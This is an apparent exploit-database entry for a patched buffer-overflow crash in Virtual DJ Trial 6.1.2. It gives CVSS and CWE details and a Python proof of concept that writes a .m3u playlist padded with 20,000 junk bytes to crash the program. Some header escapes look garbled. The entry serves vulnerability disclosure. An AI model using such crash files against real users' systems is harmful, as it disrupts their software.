header-logo
Suggest Exploit
vendor:
Virtual DJ
by:
Abhishek Lyall
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Virtual DJ
Affected Version From: 6.1.2
Affected Version To: 6.1.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:atomix_productions:virtual_dj
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC

This exploit is a proof-of-concept for a buffer overflow vulnerability in Virtual DJ Trail 6.1.2. The vulnerability is triggered when a specially crafted .m3u file is opened, causing a crash. The exploit code creates a .m3u file with a header and a large amount of junk data, which causes the application to crash when opened.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

#Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC
#vulnerble application link http://www.virtualdj.com/download/trial.html
#tested on XP SP2
#author abhishek lyall - abhilyall[at]gmail[dot]com
#web - http://www.aslitsecurity.com/
#blog - http://www.aslitsecurity.blogspot.com/
#!/usr/bin/python

filename = "crash.m3u"


head = (
"\x23\x56\x69\x72\x710\x75\x61\x6C\x1010\x10A\x20\x50\x6C\x61\x79\x6C"   
"\x69\x73\x710\x0D\x0A\x23\x10D\x69\x78\x510\x79\x70\x65\x3D\x53\x6D"
"\x61\x72\x710\x0D\x0A\x109\x3A\x5C"
)


junk = "\x41" * 20000



textfile = open(filename , 'w')
textfile.write(head+junk)
textfile.close()

Navigation

Suggest Exploit

Services By CQR